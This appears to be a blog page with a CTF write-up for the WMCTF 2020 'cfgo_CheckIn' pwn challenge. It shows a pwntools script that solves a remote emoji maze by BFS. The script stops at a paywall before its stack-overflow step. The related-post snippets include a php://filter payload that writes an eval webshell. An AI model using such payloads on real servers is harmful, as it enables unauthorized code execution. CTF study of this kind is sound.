2020WMCTF cfgo_CheckIn题解

最新推荐文章于 2023-03-17 23:43:02 发布
最新推荐文章于 2023-03-17 23:43:02 发布
阅读量981 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43116977/article/details/107755755
版权

周六周日刚打了打,战队里一共出了两道题。分别是cfgo_CheckIn跟mengyedekending。我的话是一直在做cfgo_CheckIn,mengyedekending由战队里的whalien51冲出来的。我暂时没有复现。就先写下这个cfgo_CheckIn的wp
详细解释的话放到我的博客站
不太明白的湿傅们可以去我的博客上看下具体实现

思路

编写破解迷宫算法,然后栈溢出就行了。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
import numpy as np
from collections import deque
import re
import os

context.arch = 'amd64'
elf = ELF('pwn2')
p = 0
MAX_VALUE = 0x7fffffff

class Point:

    def __init__(self, x=0, y=0):

        self.x = x

        self.y = y

 
flag_x=[]
flag_y=[]

def bfs(maze, begin, end):

    n, m = len(maze), len(maze[0])

    dist = [[MAX_VALUE for _ in range(m)] for _ in range(n)]

    pre = [[None for _ in range(m)] for _ in range(n)]   # 当前点的上一个点,用于输出路径轨迹

 

    dx = [1, 0, -1, 0] # 四个方位

    dy = [0, 1, 0, -1]

    sx, sy = begin.x, begin.y

    gx, gy = end.x, end.y

 

    dist[sx][sy] = 0

    queue = deque()

    queue.append(begin)

    while queue:

        curr = queue.popleft()

        find = False

        for i in range(4):

            nx, ny = curr.x + dx[i], curr.y + dy[i]

            if 0<=nx<n and 0<=ny<m and maze[nx][ny] != '#' and dist[nx][ny] == MAX_VALUE:

                dist[nx][ny] = dist[curr.x][curr.y] + 1

                pre[nx][ny] = curr

                queue.append(Point(nx, ny))

                if nx == gx and ny == gy:

                    find = True

                    break

        if find:

            break



    stack = []

    curr = end

    while True:

        stack.append(curr)

        if curr.x == begin.x and curr.y == begin.y:

            break

        prev = pre[curr.x][curr.y]

        curr = prev

    while stack:

        curr = stack.pop()
        flag_x.append(curr.x)
        flag_y.append(curr.y)

 

def pwn(ip,port,debug):
    global p
    if(debug == 1):
        p = process('./pwn2')

    else:
        p = remote(ip,port)
    for i in range(100):
        p.recvuntil("Now is level "+str(i+1)+'\n')
        source=p.recvlines(i+6)
        source='\n'.join(source)
        pattern = re.compile(r"\xf0\x9f..")
        result = pattern.findall(source)
        #print source
        #print result
        x=(source.find("\n"))/3
        y=source.count("\n")
        if source.find("\xf0\x9f\x98\x82")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x82")-source[0:source.find("\xf0\x9f\x98\x82"
最低0.47元/天 解锁文章
starssgo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【pwn】WMCTF2020 cfgo-CheckIn
Nothing
08-03 2266
拿到二进制后先解UPX,解完后发现程序还是很复杂,发现是cgo,做题的时候不知道有没有这种的插件支持,问了下做逆向的队友,似乎插件版本没有更新到这个版本,静态分析没有进展,先看看远程服务是跑啥的。 一个迷宫,走到旗子的位置就行了,一共100关,一波深搜就行了,解决了100关后出现了。 在二进制中搜索字符串无果,就当blind pwn做了,输入name后程序就退出了,可能存在的漏洞格式化字符串以及溢出,尝试发现没有格式化字符串漏洞,然后尝试溢出。当输入了0x78个字符后发现出现了报错信息。这里报错信息还是
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
[WMCTF2020]Web Check in 2.0
qq_62078839的博客
04-16 1511
启动靶机,打开发现源码 string(62) "Sandbox:/var/www/html/sandbox/cc551ab005b2e60fbdc88de809b2c4b1" <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); var...
WMCTF2020 web之web_checkin完整题解
qq_38338511的博客
03-17 794
这里用的是UCS-2,当然我们也可以用UCS-4 (在这就不多举例了) ,也有常见的办法,base64和strip_tags等等,但是会有弊端。明显过滤了很多,但是我们可以用二次编码绕过,因为file_put_contents中调用伪协议,会对过滤器url解码一次。如何改成自己想要的一句话木马呢?php demo_0.php 运行后会在当前目录生成一个shell.php。首先要解决的是$content要传入什么可以绕过exit()用PHP UCS-2和Rot13编码/解码脚本。改成自己的一句话木马就行了。
WMCTF2020 web之web_checkin
Firebasky的博客
08-04 2613
这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。 NU1L真的太强了,向他们看齐!!! 题目:web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP @mkdir($sandbox);//创建一个文件 @chdir($sandbox);.
Overflow-CSGO:内部CSGO作弊-正在进行中
05-23
溢流CSGO内部CSGO作弊-进行中-菜单即将重新设计我在无聊时会处理此问题,因此可能会或可能不会进行更新。 它的目标是成为HvH作弊,但目前只有合法的东西。 用蛇皮书写(大部分情况下为%95) 使用的基础: : 已知...
buu-day09
anwen12的博客
01-26 514
Day9-懒狗来打卡了 0x01 [WMCTF2020]Web Check in 2.0 绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。 =php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php 还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了 0x02 [CISCN2019
wmctf web部分wp(非官方qwq
shadowwolf’s blog
08-04 1724
web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content'];
PHP Filter伪协议Trick总结
gental_z的博客
01-04 8406
PHP Filter伪协议Trick总结 前言:最近在学习的过程中碰到了很多的filter协议的小trick,在此做一个总结以及对filter协议的一些探索。 PHP Filter协议介绍 ​ php://filter是php中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为: php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这
WMCTF_2020官方WriteUp.pdf
03-15
WMCTF_2020官方WriteUp 高清PDF版
WMCTF2020
qq_42158602的博客
08-14 1042
web web_checkin 源码 <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1801
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
web flag.php,2020 WMCTF Web Writeup
weixin_30247833的博客
03-19 454
前言周末打了下WMCTF,Web题量大且大多需要细致推敲,以下是部分Web题解。web_checkin签到题不多说了,似乎是出题的时候,忘记改flag名了……直接包含即可:http://web_checkin.wmctf.wetolink.com/?content=/flagno_body_knows_php_better_than_me题目如下:highlight_file(__FILE__);...
[WMCTF2020]easy_re
m0_46296905的博客
04-22 792
题目:[WMCTF2020]easy_re 64位无壳程序。 先在ida64里打开,发现找不到“please input the flag:”字符串,别的提示字符串也找不到, 再看文件名perl,选择网上搜索这个名词,但只了解到perl是个脚本语言, 推测是在程序运行过程中这些字符串才会显现出来,我目前所见过的能实现这样操作的也就SMC,但这题应该不是,可能是新的反静态分析的技术。 本能想到用X64dbg动态调试。 一键F9看它跑到哪里。 它停在了entrypoint处,看不出什么。为了找到那个字符串但
[GKCTF2020] web题-CheckIN
BROTHERYY的博客
07-29 563
复现环境:buuoj.cn 代码提示有eval函数可以执行base64加密代码 成功回显了phpinfo信息 编辑一句话上传 eval($_POST[1]); 根目录上有flag和readflag,但都没法访问,应该是权限不够 bypass disable_functions 该漏洞可以执行命令执行 exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 上传到有权限的目录/tmp ?Ginkg
De1CTF2020--WEB--check in
a965527596的博客
06-24 475
check in 第一步 打开题目上传一句话,发现有后缀检测和MIME类型检测,不能 上传php文件,而且有内容检测,内容中不能出现下列字符,尝试上传.htaccess。 第二步 因为检测内容中不能出现php,所以使用换行拼接。上传内容为 接下来上传一句话,同理不能出现php,利用短标签来绕过,从PHP5.4.0起<?=和<?php是一样的 使用蚁...
UML教师组建班级的活动图
最新发布
06-08
[教师组建班级的活动图-学生角色](https://i.imgur.com/9cFgO6y.png) 在上面的活动图中,方框表示活动,菱形表示判断,箭头表示控制流,双向箭头表示对象之间的消息传递。 具体的步骤如下: 1. 教师创建班级:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值